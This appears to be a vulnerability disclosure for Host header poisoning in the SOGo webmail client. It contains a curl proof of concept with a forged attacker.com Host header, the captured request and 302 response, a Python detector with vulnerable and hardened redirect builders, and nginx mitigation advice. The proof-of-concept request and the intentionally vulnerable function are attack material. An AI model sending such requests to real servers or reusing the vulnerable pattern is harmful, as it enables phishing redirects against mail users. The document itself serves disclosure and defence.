Description

The SOGo webmail client is vulnerable to Host header poisoning: the application trusts the Host header of incoming HTTP requests, so an attacker who controls that value can influence the redirects and absolute URLs the application builds, steering users to an attacker-controlled site or otherwise exploiting web application behaviour. This can lead to various attacks, including phishing or unauthorized access to sensitive data.

Steps To Reproduce
- Issue the following curl command (the stray quote after the Accept header in the original and the `*/*` eaten by the page's formatting are restored):

```shell
curl --path-as-is -i -s -k -X $'GET' \
-H $'Host: attacker.com' -H $'Cache-Control: no-cache' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer: http://192.168.2.84/' -H $'DNT: 1' -H $'Sec-GPC: 1' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Priority: u=0, i' -H $'Cookie: 0xHIGHFLYxSOGo=' \
$'http://domain.com/SOGo/admin%40test.com/view?'
```
- Observe that the application accepts the request with the malicious Host header and answers with a 302 whose Location header points at the attacker-controlled web server (attacker.com), so the client is redirected there.
Request:

```http
GET /SOGo/admin%40test.com/view? HTTP/1.1
Host: attacker.com
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.2.84/
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: ...snip...
Priority: u=0, i
```
Response:

```http
HTTP/1.1 302 Found
Server: nginx
Date: Sat, 14 Sep 2024 23:38:31 GMT
Content-Type: text/plain
Content-Length: 0
Connection: keep-alive
Location: http://attacker.com/SOGo/so/admin@test.com/Mail
Strict-Transport-Security: max-age=15768000;
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Robots-Tag: none
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin
```
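The Python below is an added example and is not part of the report or of SOGo's own code. It shows two things a defender wants next to a finding like this: a check that flags a captured 3xx response whose Location points outside the deployment's own hosts (run here over a trimmed copy of the response above), and the redirect-building pattern the report describes next to a hardened version that validates Host against an allowlist and builds the URL from a configured canonical base instead of the request. `ALLOWED_HOSTS`, `CANONICAL_BASE`, the function names and the trimmed response text are all constructed for the example.

```python
"""Detection and mitigation helpers for Host-header-driven redirects.

Added example (not from the report or from SOGo). The allowlist, the
canonical base URL, the function names and the sample response are
constructed for illustration.
"""
from __future__ import annotations

from urllib.parse import urlsplit

# Hosts this deployment legitimately answers to (constructed allowlist).
ALLOWED_HOSTS = {"mail.example.com", "192.168.2.84"}

# Canonical external base URL to use whenever an absolute URL must be built.
# It is configuration, never derived from the request's Host header.
CANONICAL_BASE = "https://mail.example.com"

# Trimmed copy of the 302 shown in the report (constructed; only the headers
# that matter for the check are kept).
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: nginx\r\n"
    "Content-Type: text/plain\r\n"
    "Content-Length: 0\r\n"
    "Location: http://attacker.com/SOGo/so/admin@test.com/Mail\r\n"
    "\r\n"
)


def parse_response_headers(raw: str) -> tuple[int, dict[str, str]]:
    """Return (status code, headers with lowercased names) for a raw HTTP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def redirect_leaves_origin(raw: str, allowed_hosts: set[str]) -> bool:
    """Detection: True when a 3xx response's Location targets a host outside the allowlist.

    A redirect to a host that is not one of ours is the visible symptom of the
    Host header being echoed into Location; this is the assertion to put in a
    proxy log review or an integration test.
    """
    status, headers = parse_response_headers(raw)
    if not 300 <= status < 400 or "location" not in headers:
        return False
    target = urlsplit(headers["location"])
    if not target.netloc:  # relative redirect stays on the current origin
        return False
    return (target.hostname or "").lower() not in allowed_hosts


def build_redirect_vulnerable(request_host: str, path: str) -> str:
    """The pattern the report describes: Location assembled from the request's Host."""
    return f"http://{request_host}{path}"


def build_redirect_hardened(request_host: str, path: str) -> str:
    """Mitigation: validate Host against the allowlist, build from CANONICAL_BASE.

    Raises ValueError for an unexpected Host so the caller can answer 400
    instead of emitting any redirect. The path is forced to a single leading
    slash so a value like "//evil.example" or "http://evil.example" cannot
    turn into a different origin.
    """
    host = request_host.split(":", 1)[0].lower()  # ignore an explicit port
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"unexpected Host header: {request_host!r}")
    return CANONICAL_BASE + "/" + path.lstrip("/")


if __name__ == "__main__":
    mail_path = "/SOGo/so/admin@test.com/Mail"
    print("captured response leaves origin:",
          redirect_leaves_origin(SAMPLE_RESPONSE, ALLOWED_HOSTS))
    print("vulnerable:", build_redirect_vulnerable("attacker.com", mail_path))
    try:
        build_redirect_hardened("attacker.com", mail_path)
    except ValueError as exc:
        print("hardened rejects:", exc)
    print("hardened:", build_redirect_hardened("mail.example.com", mail_path))
```

In front of the application the same allowlist belongs in the reverse proxy: with nginx (the `Server` header above), a `default_server` block that matches any unknown `server_name` and closes the connection (`return 444;`) stops a foreign Host value from reaching SOGo at all, and the application-side check above remains as defence in depth.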